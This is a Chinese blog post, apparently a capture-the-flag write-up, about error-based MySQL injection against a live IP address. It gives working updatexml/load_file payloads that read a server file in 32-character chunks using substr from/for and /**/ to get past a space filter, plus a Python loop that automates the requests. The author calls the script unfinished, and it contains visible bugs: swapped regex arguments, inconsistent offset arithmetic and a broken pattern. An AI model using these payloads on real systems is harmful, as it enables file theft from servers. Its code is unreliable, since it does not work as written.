http://103.238.227.13:10088/?id=1

在读取文件的时候发现不能够一下子全部读取出来。经过百度学习了一下，看到别人使用from for说实在此前真不知道这操作。

先来看一下from for吧

1 mysql> select database(); 2 +------------+ 3 | database() | 4 +------------+ 5 | typecho    | 6 +------------+ 7 1 row in set (0.00 sec) 8  9 mysql> select substr(database() from 1 for 2);10 +---------------------------------+11 | substr(database() from 1 for 2) |12 +---------------------------------+13 | ty                              |14 +---------------------------------+15 1 row in set (0.00 sec)16 17 mysql> select substr(database() from 2 for 3);18 +---------------------------------+19 | substr(database() from 2 for 3) |20 +---------------------------------+21 | ype                             |22 +---------------------------------+23 1 row in set (0.00 sec) #说明前面一个数字是从第几个开始读取，最后的一个数字是读取的长度。

大概懂了吧，就是起到一个分页的效果。

那么再用到注入里自然就OK了。

PS:过滤了空格可以用使用/**/进行替换，还有就是updatexml最多只能显示32位的长度，所以for的数字是32。

http://103.238.227.13:10088/?id=1/**/and/**/updatexml(1,concat(1,(select/**/substr(hex(load_file(0x2f7661722f746573742f6b65795f312e706870))from/**/1/**/for/**/32)),1),1)

然后写一个脚本吧from后面的数字每次+32,for也要加就可以了。

以下脚本待完善。

1 #!/usr/bin/env python 2 #encoding:utf-8 3 #by i3ekr 4  5 import requests,re 6 from lxml import etree 7 n1 = 1 8 n2 = 32 9 10 for i in range(0,100):11     url ="""12 http://103.238.227.13:10088/?id=1/**/and/**/updatexml(1,concat(1,(select/**/substr(hex(load_file(0x2f7661722f746573742f6b65795f312e706870))from/**/%d/**/for/**/%d)),1),1)13     """%(n1,n2)14     html = requests.get(url,timeout=5).text15     print(html)16     result=re.findall(html,"[A-Z][0-9][A-Z][0-9]")17     result = re.findall("[A-Z][0-9][A-Z][0-9]{
   29}",html)18     print(result)19     n1+=3120     n2+=32